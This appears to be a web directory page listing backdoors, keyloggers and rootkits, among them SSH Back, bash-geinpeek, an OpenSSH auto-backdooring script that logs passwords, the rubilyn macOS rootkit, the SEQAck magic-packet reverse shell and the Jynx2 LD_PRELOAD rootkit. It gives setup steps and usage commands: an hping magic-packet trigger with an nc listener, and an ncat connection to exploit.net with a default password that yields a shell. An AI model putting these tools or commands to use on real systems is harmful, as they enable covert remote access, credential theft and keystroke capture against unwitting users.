Remote Administration Tool

Backdoor, tool that allows you to remotely access and control a computer/device

SSH Back

SSH Back is a set of shell scripts that assist you in shuffling an ssh connection over socat and ssl.

              __     ______              __
.-----.-----.|  |--.|   __ \.---.-.----.|  |--.
|__ --|__ --||     ||   __ <|  _  |  __||    <
|_____|_____||__|__||______/|___._|____||__|__|
Copyright (C) 2014

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.

Have you ever needed to have access to an ssh server from behind
a NAT'ed firewall? Now you can. SSHBack allows you to have reverse
ssh connections connect back to you.

Made from 100% FOSS recycled materials, this software is made to
withstand the most demanding conditions, including, but not
limited to: __FILL_IN_BLANK_HERE__

(For amusement purposes only. Do not abuse or misuse this product.
Do not ruin anyone's day with this software, please!)

sshback client machine: has openssh-server on
sshback sever machine: has openssh-client on

NOTE: "Server_Common_Name" must be able to DNS resolve
      on the client machine, e.g.
$ host <a href="http://www.servercommonname.com<br />
www.servercommonname.com" title="www.servercommonname.com<br />
www.servercommonname.com">www.servercommonname.com<br />
www.servercommonname.com</a> has address xxx.xxx.xxx.xxx

run
$ ./sshback_make_certs.sh
to make all the certs

then move client.pem, server.crt, and sshback_client.sh to the
  machine with openssh-server installed
make sure 'socat' is installed
chmod +x sshback_client.sh

bash-geinpeek

A keylogger tool that a set of patches for bash and a command, captures all logged in user inputs and sends it into fifos. then can be able to monitor those key-strokes in real-time.

1. get bash-3.0.tar.gz
2. tar xzvf bash-3.0.tar.gz
3. cd bash-3.0
4. wget http://www.chollian.net/~jyj9782/geinblues/stuff/bash-geinpeek/bash-3.0-
geinpeek-0.2.tar.gz
5. tar xzvf bash-3.0-geinpeek-0.2.tar.gz
6. patch < Makefile.in-geinpeek.diff

7. patch < [patch file name you wanna add]

patch kit list

- execute_cmd.c-geinpeek.diff ( not stable yet )
- shell.c-geinpeek.diff ( not good )

the forces with you man ~

NEW FEATURE:

[root@elizabeth bash-3.0]# ./ghelper s.txt
[BASH-GEINPEEK MONITOR]
[Hint: when if you have to stop it 'CTRL+C']
Mon Feb 13 03:20:53 2006 - [file@/dev/pts/38 /tmp]$ ls --color=tty -al
Mon Feb 13 03:20:53 2006 - [file@/dev/pts/38 /tmp]$ ls --color=tty
Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ./script.sh
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ls
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ls
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ whoami

[root@elizabeth bash-3.0]# ./ghelper s.txt -i
[BASH-GEINPEEK MONITOR]
[Hint: when if you have to stop it 'CTRL+C']
Mon Feb 13 03:21:01 2006 - [file@/dev/pts/38 /tmp]$ ./script.sh
Mon Feb 13 03:21:02 2006 - [file@/dev/pts/38 /tmp]$ ls --color=tty
Mon Feb 13 03:21:03 2006 - [file@/dev/pts/38 /tmp]$ clear

above !s! marked command logs are executed in some shell script.
then -i flag of ghelper ignored standard output of them.

satyr's openssh autobackdooring doohicky

This script provides OpenSSH backdoor functionality with a magic password and logs passwords as well. It leverages the same basic idea behind common OpenSSH patches but this script attempts to make the process version agnostic. Use at your own risk.

# ============================================
# satyr's openssh autobackdooring doohicky v0.-1
#  ImpendingSatyr@gmail.com
# ============================================
# USAGE:
#      Run this script with no args and it'll prompt for the "Magic" password and location to log passwords to (incoming and outgoing).
#      If you give the location that passwords will be logged to as an arg, this script will try to automate almost everything
#      (Like common openssh compiling problems, such as missing pam, kerberos, zlib, openssl-devel, etc.
#      [it'll install them via apt or yum, whichever is available]).
#      Note: This script will delete itself once it's fairly sure the openssh compile went smoothly.
#      It's up to you to clean the logs of those yum/apt installs if they're needed, and to restart sshd.
# ============================================
# WTF:
#      I noticed that most openssh code doesn't change too much among versions, and that most openssh backdoors are
#      just diff patches for specific versions of openssh. So I thought it would be nice to have a script that applies
#      such a patch based on those similar chunks of code instead of relying on diff patches so that it can be done on different
#      versions without any modifying (I've seen kiddies apply backdoor patches for a version of openssh that wasn't
#      originally being used on the box, which is just lazy & dumb).
#      So I wrote up this to make the whole process a bit easier (For use in my own private network of course o.O)
# ============================================

MBR Data Hider, MBR Store

This tool stores up to 426 bytes in the MBR's bootloader code section of unused devices such as usb drivers, hrd disks (which are not supposed to boot) and other media. GRUB detection is implemented for safety reasons, Windows bootloader code will be shamelessly overwritten.

iXKeylog

Description:
XKeylog is a X11 keylogger for Unix that basically uses xlib to interact with users keyboard. iXkeylog will listen for certain X11 events and then trigger specific routines to handle these events.

MD5:
39e280cd02a3f01dffa1c6cae8e5b17e

Author:
Cyneox

rubilyn

/*
                        .o8        o8o  oooo
                       "888        `"'  `888
  oooo d8b oooo  oooo   888oooo.  oooo   888  oooo    ooo ooo. .oo.
  `888""8P `888  `888   d88' `88b `888   888   `88.  .8'  `888P"Y88b
   888      888   888   888   888  888   888    `88..8'    888   888
   888      888   888   888   888  888   888     `888'     888   888
  d888b     `V88V"V8P'  `Y8bod8P' o888o o888o     .8'     o888o o888o
                                            .o..P' HARDCORE EST. 1983
                                            `Y8P'

  64bit Mac OS-X kernel rootkit that uses no hardcoded address
  to hook the BSD subsystem in all OS-X Lion & below. It uses a
  combination of syscall hooking and DKOM to hide activity on a
  host. String resolution of symbols no longer works on Mountain
  Lion as symtab is destroyed during load, this code is portable
  on all Lion & below but requires re-working for hooking under
  Mountain Lion.

  Features:
  * works across multiple kernel versions (tested 11.0.0+)
  * give root privileges to pid
  * hide files / folders
  * hide a process
  * hide a user from 'who'/'w'
  * hide a network port from netstat
  * sysctl interface for userland control
  * execute a binary with root privileges via magic ICMP ping

  greetingz to #nullsecurity crew, snare, dino, nemo, thegrugq,
  piotr & friendz!

  -- prdelka
*/

mbr_store

This tool stores up to 426 bytes in the MBR's bootloader code section of unused devices such as usb drivers, hrd disks (which are not supposed to boot) and other media. GRUB detection is implemented for safety reasons, Windows bootloader code will be shamelessly overwritten.

INSTALLATION
make
sudo make install
make clean

FIRST STEPS
Get yourself a copy of your own MBR with
dd if=/dev/sdx of=my_mbr.img count=1
or use one of the provided samples in doc/.
Read, store and check your results with your favorite hex editor (e.g. g
hex2).
Be careful to not demage your bootloader!
Run fdisk -l or dmesg to determine the correct device Wink

AUTHOR
atzeton
nullsecurity.net

LICENSE
GNU GPLv2+

SEQ/ACK Reverse Connect SSL Shell

SEQAck is an SSL encrypted, magic packet triggered reverse connect backdoor application. I wrote this as part of the original Jynx-Kit LD_PRELOAD rootkit, as released on from the Blackhat Library. With the second installation of the rootkit, we moved away from the stand alone reverse connection backdoor, and decided to hook accept() system call instead. Not only was it simply to demonstrate another example of creating a backdoor, but it also fit perfectly with what we were doing; making things more modular.

This backdoor silently sniffs on the given interface for all incoming TCP packets. It relies on two defined rules, MAGIC_SEQ and MAGIC_ACK, which are easily manipulated in the TCP headers. Once the magic packet is received, it initiates an SSL encrypted reverse connecting shell to the host that sent the packet, on the given source port. For example, we can initiate the reverse connect with the following hping command.

# hping -M 0xdead -L 0xbeef google.com -s 5000 -c 1

Notice, the source port is 5000, SEQ (-M) is 0xdead and ACK (-L) is 0xbeef. With this example, we'd also need the following nc (netcat supplied with nmap) running in the background to accept the incoming connection.

# nc -l -p 5000 --ssl

And there you have it, the reverse connect shell was successful, and you're in complete control. The idea of using SEQ/ACK values could be applied to a single packet port knock sequence as well, so this application could be easily tweaked or expanded upon based on your requirements

Jynx Rootkit/2.0

Jynx2 is an expansion of the original Jynx LD_Preload rootkit written in C with several modifications for multi-factor authentication, a more compatible shell drop, and additional hiding features.

Features:
Hiding from netstat
Hiding from ps/top and /proc
File hiding
SSL connect accept() hook
Multi-factor authentication
Improved anti-removal features
SUID Drop-shell with environment variable

Protip: It is possible to make Jynx2 even more difficult to remove by hooking C's link() function, therefore we recommend that any LD_Preload rootkit be removed using a LiveCD.

Usage:
Once Jynx2 is successfully installed on a target machine, accessing it's accept() hook with the default configuration looks like:

[user@host ~]$ sudo ncat exploit.net 80 -p 42 --ssl
DEFAULT_PASS
Bump with shell.
>ls -lia
214473 drwxr-xr-x 2 user users 176 Mar 7 19:19 .
177137 drwxr-xr-x 15 user users 952 Mar 5 22:15 ..

Protip: Make sure to using the --ssl flag with ncat, otherwise Jynx2 will not accept the connection, with the connection's file descriptor being passed to the backdoored service in stead.

Smbclient

ftp-like client to access SMB/CIFS resources on servers. This tool is part of the linux samba suite.

Syndicate content